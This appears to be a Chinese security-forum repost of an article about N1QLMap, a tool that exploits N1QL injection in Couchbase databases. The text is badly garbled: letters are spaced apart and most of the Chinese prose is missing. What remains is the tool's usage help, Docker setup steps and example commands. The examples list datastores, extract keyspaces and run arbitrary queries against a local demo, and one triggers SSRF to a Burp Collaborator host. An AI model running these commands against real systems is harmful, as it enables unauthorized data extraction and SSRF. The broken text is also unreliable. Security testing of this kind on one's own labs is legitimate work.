搜索

[16243] 2020-12-24_N1QLMap:利用N1QL注入漏洞从Couchbase数据库中提取数据

文档创建者:s7ckTeam
浏览次数:12
最后更新:2025-01-18
2020-12-24_N1QLMap:利用N1QL注入漏洞从Couchbase数据库中提取数据 N 1 Q L M a p N 1 Q L C o u c h b a s e A l p h a _ h 4 c k   F r e e B u f   2 0 2 0 - 1 2 - 2 4 N 1 Q L M a p N 1 Q L M a p N 1 Q L C o u c h b a s e C U R L S S R F P y t h o n 广 使 g i t   c l o n e   h t t p s : / / g i t h u b . c o m / F S e c u r e L A B S / N 1 Q L M a p . g i t u s a g e :   n 1 q l M a p . p y   [ - h ]   [ - r   R E Q U E S T ]   [ - k   K E Y W O R D ]   [ - - p r o x y   P R O X Y ]   [ - - v a l i d a t e c e r t s ]   [ - v ]                                     ( - d   |   - k s   D A T A S T O R E _ U R L   |   - e   K E Y S P A C E _ I D   |   - q   Q U E R Y   |   - c   [ E N D P O I N T   [ O P T I O N S   . . . ] ] )                                     h o s t p o s i t i o n a l   a r g u m e n t s :     h o s t                                     H o s t   u s e d   t o   s e n d   a n   H T T P   r e q u e s t   e . g .   h t t p s : / / v u l n d o m a i n . n e t o p t i o n a l   a r g u m e n t s :     - h ,   - - h e l p                         s h o w   t h i s   h e l p   m e s s a g e   a n d   e x i t     - r   R E Q U E S T ,   - - r e q u e s t   R E Q U E S T                                                 P a t h   t o   a n   H T T P   r e q u e s t     - k   K E Y W O R D ,   - - k e y w o r d   K E Y W O R D                                                 K e y w o r d   t h a t   e x i s t s   i n   H T T P   r e s p o n s e   w h e n   q u e r y   i s   s u c c e s s f u l     - - p r o x y   P R O X Y                   P r o x y   s e r v e r   a d d r e s s     - - v a l i d a t e c e r t s               S e t   t h e   f l a g   t o   e n f o r c e   c e r t i f i c a t e   v a l i d a t i o n .   C e r t i f i c a t e s   a r e   n o t   v a l i d a t e d   b y   d e f a u l t !     - v ,   - - v e r b o s e _ d e b u g       S e t   t h e   v e r b o s i t y   l e v e l   t o   d e b u g     - d ,   - - d a t a s t o r e s             L i s t s   a v a i l a b l e   d a t a s t o r e s     - k s   D A T A S T O R E _ U R L ,   - - k e y s p a c e s   D A T A S T O R E _ U R L                                                 L i s t s   a v a i l a b l e   k e y s p a c e s   f o r   s p e c i f i c   d a t a s t o r e   U R L
使 使 r e q u e s t . t x t H T T P 使 i e x a m p l e _ r e q u e s t _ 1 . t x t I D C U R L / S S R F P y t h o n   3 N 1 Q L M a p . p y D e m o D e m o n 1 q l - d e m o D o c k e r D o c e r   C o m p o s e K a l i D o c k e r D o c k e r   C o m p o s e D o c k e r 使 使 - D e m o N 1 Q L 使 C o u c h b a s e N o d e J S   W e b D o c k e r     - e   K E Y S P A C E _ I D ,   - - e x t r a c t   K E Y S P A C E _ I D                                                 E x t r a c t s   d a t a   f r o m   a   s p e c i f i c   k e y s p a c e     - q   Q U E R Y ,   - - q u e r y   Q U E R Y                                                 R u n   a r b i t r a r y   N 1 Q L   q u e r y     - c   [ E N D P O I N T   [ O P T I O N S   . . . ] ] ,   - - c u r l   [ E N D P O I N T   [ O P T I O N S   . . . ] ]                                                 R u n s   C U R L   N 1 Q L   f u n c t i o n   i n s i d e   t h e   q u e r y ,   c a n   b e   u s e d   t o   S S R F $   . / n 1 q l M a p . p y   h t t p : / / l o c a l h o s t : 3 0 0 0   - - r e q u e s t   e x a m p l e _ r e q u e s t _ 1 . t x t   - - k e y w o r d   b e e r - s a m p l e   - - d a t a s t o r e s $   . / n 1 q l M a p . p y   h t t p : / / l o c a l h o s t : 3 0 0 0   - - r e q u e s t   e x a m p l e _ r e q u e s t _ 1 . t x t   - - k e y w o r d   b e e r - s a m p l e   - - k e y s p a c e s   " h t t p : / / 1 2 7 . 0 . 0 . 1 : 8 0 9 1 " $   . / n 1 q l M a p . p y   h t t p : / / l o c a l h o s t : 3 0 0 0   - - r e q u e s t   e x a m p l e _ r e q u e s t _ 1 . t x t   - - k e y w o r d   b e e r - s a m p l e   - - e x t r a c t   t r a v e l - s a m p l e $   . / n 1 q l M a p . p y   h t t p : / / l o c a l h o s t : 3 0 0 0   - - r e q u e s t   e x a m p l e _ r e q u e s t _ 1 . t x t   - - k e y w o r d   b e e r - s a m p l e   - - q u e r y   ' S E L E C T   *   F R O M   ` t r a v e l - s a m p l e `   A S   T   O R D E R   b y   M E T A ( T ) . i d   L I M I T   1 ' $   . / n 1 q l M a p . p y   h t t p : / / l o c a l h o s t : 3 0 0 0   - - r e q u e s t   e x a m p l e _ r e q u e s t _ 1 . t x t   - - k e y w o r d   b e e r - s a m p l e   - - c u r l   * * * * * * * * * * * * * j 3 m r t 7 x y 3 p r e . b u r p c o l l a b o r a t o r . n e t   " { ' r e q u e s t ' : ' P O S T ' , ' d a t a ' : ' d a t a ' , ' h e a d e r ' : [ ' U s e r - A g e n t :   A g e n t   S m i t h ' ] } " #   D o c k e r   I n s t a l l a t i o n c u r l   - f s S L   h t t p s : / / d o w n l o a d . d o c k e r . c o m / l i n u x / d e b i a n / g p g   |   a p t - k e y   a d d   - e c h o   ' d e b   [ a r c h = a m d 6 4 ]   h t t p s : / / d o w n l o a d . d o c k e r . c o m / l i n u x / d e b i a n   b u s t e r   s t a b l e '   >   / e t c / a p t / s o u r c e s . l i s t . d / d o c k e r . l i s t a p t - g e t   u p d a t e a p t - g e t   r e m o v e   d o c k e r   d o c k e r - e n g i n e   d o c k e r . i o a p t - g e t   i n s t a l l   d o c k e r - c e #   S t a r t   D o c k e r   S e r v i c e s y s t e m c t l   s t a r t   d o c k e r #   D o c k e r   C o m p o s e   I n s t a l l a t i o n s u d o   c u r l   - L   " h t t p s : / / g i t h u b . c o m / d o c k e r / c o m p o s e / r e l e a s e s / d o w n l o a d / 1 . 2 4 . 1 / d o c k e r - c o m p o s e - $ ( u n a m e   - s ) - $ ( u n a m e   - m ) "   - o   / u s r / l o c a l / b i n / d o c k e r - c o m p o s e s u d o   c h m o d   + x   / u s r / l o c a l / b i n / d o c k e r - c o m p o s e d o c k e r   r u n   h e l l o - w o r l d c d   n 1 q l - d e m o . / q u i c k _ s e t u p . s h
N 1 Q L M a p N 1 Q L C o u c h b a s e N 1 Q L M a p h t t p s : / / g i t h u b . c o m / F S e c u r e L A B S / N 1 Q L M a p h t t p s : / / l a b s . f - s e c u r e . c o m / b l o g / n 1 q l - i n j e c t i o n - k i n d - o f - s q l - i n j e c t i o n - i n - a - n o s q l - d a t a b a s e . / q u i c k _ s e t u p . s h
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理